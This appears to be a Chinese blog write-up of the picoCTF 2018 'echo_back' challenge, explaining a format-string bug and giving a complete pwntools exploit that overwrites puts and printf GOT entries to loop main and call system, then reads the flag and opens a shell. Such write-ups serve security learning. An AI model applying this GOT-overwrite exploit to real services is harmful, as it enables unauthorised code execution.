picoctf_2018_echo_back

注意
本文最后更新于 2021-06-02,文中内容可能已过时。

题目分析

简单的格式化字符串,修改got@putsmain函数地址制造循环即可:

  • 先制造循环
  • 修改printf@gotsystem@plt
  • 输入/bin/sh获取shell

最终EXP

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from pwn import *

sh:tube = process('./PicoCTF_2018_echo_back')
cur_elf:ELF = all_parsed_args['cur_elf']

puts_got_addr = cur_elf.got['puts']
printf_got_addr = cur_elf.got['printf']
system_plt_addr = cur_elf.plt['system']
main_addr = cur_elf.sym['main']

context.arch = "i386"
payload = fmtstr_payload(offset=7, writes={puts_got_addr: main_addr}, write_size="short", write_size_max="short")

sh.recv()
sh.sendline(payload)

payload = fmtstr_payload(offset=7, writes={printf_got_addr: system_plt_addr}, write_size="short", write_size_max="short")
sh.recv()

sleep(2)

sh.sendline(payload)

sh.recv()

sleep(2)

# sh.sendline("/bin/sh")

sh.sendline('cat flag')

sh.interactive()

远程打:

image-20210603000405650

引用与参考

1、My Blog

Buy me a coffee~
roderick 支付宝支付宝
roderick 微信微信
0%